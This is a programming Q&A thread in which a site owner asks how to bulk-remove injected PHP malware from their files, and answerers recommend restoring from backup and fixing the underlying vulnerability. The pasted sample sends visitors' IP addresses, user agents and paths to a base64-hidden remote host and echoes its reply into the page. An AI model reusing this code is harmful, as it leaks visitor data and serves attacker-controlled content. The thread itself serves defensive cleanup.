# Malware removal using perl regex

Tags: php, regex

Is there any way to remove the code below from multiple files and directories:

```
if (!isset($sRetry)) 
{
    global $sRetry;
    $sRetry = 1; // This code use for  lobal bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";

    if (strstr($sUserAgent, 'google') == false && 
        strstr($sUserAgent, 'yahoo') == false && 
        strstr($sUserAgent, 'baidu') == false && 
        strstr($sUserAgent, 'msn') == false && 
        strstr($sUserAgent, 'opera') == false && 
        strstr($sUserAgent, 'chrome') == false && 
        strstr($sUserAgent, 'bing') == false && 
        strstr($sUserAgent, 'safari') == false && 
        strstr($sUserAgent, 'bot') == false) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['HTTP_HOST'])) 
        { //  reate  bot analitics
            $stCurlLink = base64_decode('aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw') . 
                '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) . 
                '& seragent=' . urlencode($sUserAgent) . 
                '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . 
                '& ullpath=' . urlencode($_SERVER['REQUEST_URI']) . 
                '& check=' . isset($_GET['look']);
            $stCurlHandle = curl_init($stCurlLink);
        }
    }

    if ($stCurlHandle !== NULL) 
    {
        curl_setopt($stCurlHandle, URLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);

        if $sResult[0] == "O") 
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end

        }
        curl_close($stCurlHandle);
    }
}
```

Comment: Please paste your code again, select the pasted code and click the code button when editing.

Comment: How about removing the actual vulnerability that enabled someone to inject that code in to your pages?

Answer (score 3):

Don't do this.  Never try to repair an attack.  You can never be 100% sure if you got it all.  After all, you know of this particular injection.  How do you know there aren't other backdoors in other places?

The best way of handling it is to restore from a backup and fix the vulnerability.

Don't have a backup?  Well, lesson learned.  Now go to your host and ask them (they should have a recent one, but if they'll roll it for you is another matter).

If they don't have one either, well then you're stuck trying to repair.  But even then, I would **not** recommend doing this in an automatic manner.  Instead, go file by file and look at what was there.  You don't know how many versions of this "exploit" exist unless you manually go in to each file and check.  So I wouldn't try to build a regexp, I would do it by hand and recommend you do so.  But only as a last resort to the backup...

Answer (score -1):

Yes, I suppose you are on Windows (Unix users would know to use `sed`). I would try some free software that can do that: for example http://www.digitalvolcano.co.uk/content/textcrawler. Or better yet, download any php IDE. All can do bulk find&replace.

Comment: No I am on a Linux box. Its not easy to use sed since there are too many quotes and special chars. \Q \E also not work